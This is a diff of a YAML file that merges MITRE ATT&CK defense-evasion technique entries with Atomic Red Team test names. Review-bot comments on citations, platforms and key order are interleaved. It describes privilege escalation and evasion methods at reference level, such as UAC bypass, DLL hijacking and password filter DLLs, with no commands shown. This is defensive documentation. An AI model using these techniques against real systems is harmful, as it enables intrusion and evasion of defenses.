- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -1814,7 +1896,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests:
- name: Bypass UAC using Event Viewer (cmd)
@@ -2515,7 +2596,7 @@ defense-evasion:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -2549,13 +2630,11 @@ defense-evasion:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1578:
technique:
- modified: '2023-09-05T20:45:22.041Z'
+ modified: '2024-09-30T13:28:37.414Z'
name: Modify Cloud Compute Infrastructure
description: |-
An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
@@ -2607,12 +2686,11 @@ defense-evasion:
- source_name: Mandiant M-Trends 2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
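Review bot: the Mandiant M-Trends 2020 reference keeps "Retrieved April 24, 2020." while the URL is re-pointed to `.../2021-09/mtrends-2020.pdf`, a path that did not exist on the stated retrieval date. Either update the retrieval date as the twitter-to-x.com hunks in this diff do, or leave the original URL and add the new one as a mirror, so the citation stays internally consistent.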
@@ -2692,7 +2770,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests:
- name: UEFI Persistence via Wpbbin.exe File Creation
@@ -2713,7 +2790,7 @@ defense-evasion:
elevation_required: true
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -2732,7 +2809,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -2746,7 +2822,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -2773,8 +2848,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -2805,7 +2880,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests:
- name: Service Registry Permissions Weakness
@@ -2921,7 +2997,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -2974,7 +3049,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -2990,11 +3065,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -3040,8 +3114,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -3051,9 +3125,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests:
- name: Masquerade as a built-in system executable
@@ -3110,7 +3183,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -3134,8 +3207,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -3199,11 +3270,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -3224,8 +3294,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -3269,7 +3339,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests:
- name: Extract binary files via VBA
@@ -3406,7 +3475,7 @@ defense-evasion:
elevation_required: false
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -3426,9 +3495,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
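Review bot: the added sentence "an adversary that creates a new identity provider for an AWS Organization" is loose about where the change lands. AWS IAM Identity Center is the organization-level service named earlier in the same sentence; what the adversary changes is its identity source (an external SAML IdP), and it is that configuration that lets them sign in as any Identity Center user and reach every member account through the assigned permission sets. Suggest: "configures a new external identity provider as the identity source for an AWS Organization's IAM Identity Center". Separately, the citation key `AADInternals zure AD Federated Domain` in the unchanged context line looks like a dropped "A"; it is pre-existing, but if `external_references` carries the same misspelled `source_name` it resolves only by accident and should be fixed upstream.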
@@ -3448,9 +3522,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
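Review bot: collapsing `Azure AD` and `SaaS` into `Identity Provider` for T1484.002 has the same index side effect as the `Office Suite` change elsewhere in this diff: anything that builds per-platform views from `x_mitre_platforms` will stop listing this sub-technique under Azure AD or SaaS. The description still explicitly covers Okta, Entra ID federation and now AWS IAM Identity Center, so confirm the index generator treats `Identity Provider` as covering those, or the Azure AD index loses a technique with no change in coverage intent.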
@@ -3467,6 +3540,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -3500,7 +3577,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1562.009:
@@ -3550,7 +3626,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -3578,8 +3654,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests:
- name: Safe Mode Boot
@@ -3633,7 +3707,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -3657,12 +3731,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
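Review bot: Pre-existing inconsistency worth fixing in the generator while this area is being touched: the TFTP Boot entry that ends at `atomic_tests: []` just before `T1497.001:` has no `identifier:` key, while T1562.009 and T1484.002 above carry `identifier: <technique id>` before `atomic_tests`. Consumers that read `identifier` rather than the map key will skip such entries; emitting `identifier` for every technique, including those with an empty test list, would make the file uniform.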
@@ -3752,13 +3824,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests:
- name: Detect Virtualization Environment (Windows)
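Review bot: The updated Deloitte Environment Awareness citation points at a Google Drive `/edit` URL (`.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`). An `/edit` link is the form the document owner copies from their editor and may prompt for access permission; the `/view` form of the same file id is the stable read-only link and is what a citation should carry. Since this comes from upstream, it is worth reporting there rather than patching locally, but the Retrieved date was refreshed to September 13, 2024, so the link presumably resolved at that time.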
@@ -3817,7 +3888,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -3842,8 +3913,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -3872,7 +3941,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
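Review bot: Besides the `modified` timestamp moving backwards (2022-05-11 to 2022-03-11), the description context for T1218.004 reads `C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe` with nothing between `v` and the next path separator, and the closing `.` sits on a line of its own. That looks like an angle-bracket version placeholder that was stripped when the description was imported; check whether the generator removes HTML-like tokens from upstream descriptions, since the same stripping would damage any other description that uses them.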
@@ -3898,8 +3967,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests:
- name: CheckIfInstallable method call
@@ -4508,18 +4575,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -4535,8 +4601,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -4550,7 +4616,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -4576,6 +4642,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
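Review bot: The new Hexacorn DLL Hijacking reference is consistent with the `(Citation: Hexacorn DLL Hijacking)` marker added to the T1574.001 description and with the `x_mitre_version` bump to 1.3, so that part is fine. One pre-existing defect in the adjacent context: the Microsoft Security Advisory 2269637 citation reads `Microsoft. (, May 23).` with the year missing; it is upstream data, so it belongs in an upstream report rather than a local edit.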
@@ -4603,7 +4673,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests:
- name: DLL Search Order Hijacking - amsi.dll
@@ -4672,7 +4741,7 @@ defense-evasion:
elevation_required: true
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -4768,7 +4837,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -4835,7 +4903,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -4900,11 +4967,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -4965,7 +5031,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests:
- name: Take ownership using takeown utility
@@ -5125,7 +5190,7 @@ defense-evasion:
elevation_required: true
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -5151,7 +5216,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -5193,7 +5258,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -5235,7 +5299,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -5258,7 +5322,6 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests:
- name: Msiexec.exe - Execute Local MSI file with embedded JScript
@@ -5663,31 +5726,7 @@ defense-evasion:
name: command_prompt
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
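Review bot: Almost everything removed here (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) is re-added in the next hunk in a different key order, so the diff reads as a rewrite of T1556.002 when the content change is small. Having the generator serialize technique keys in a stable order (sorted, or the upstream order) would keep future syncs to the lines that actually change and make review of this file practical.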
@@ -5711,22 +5750,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
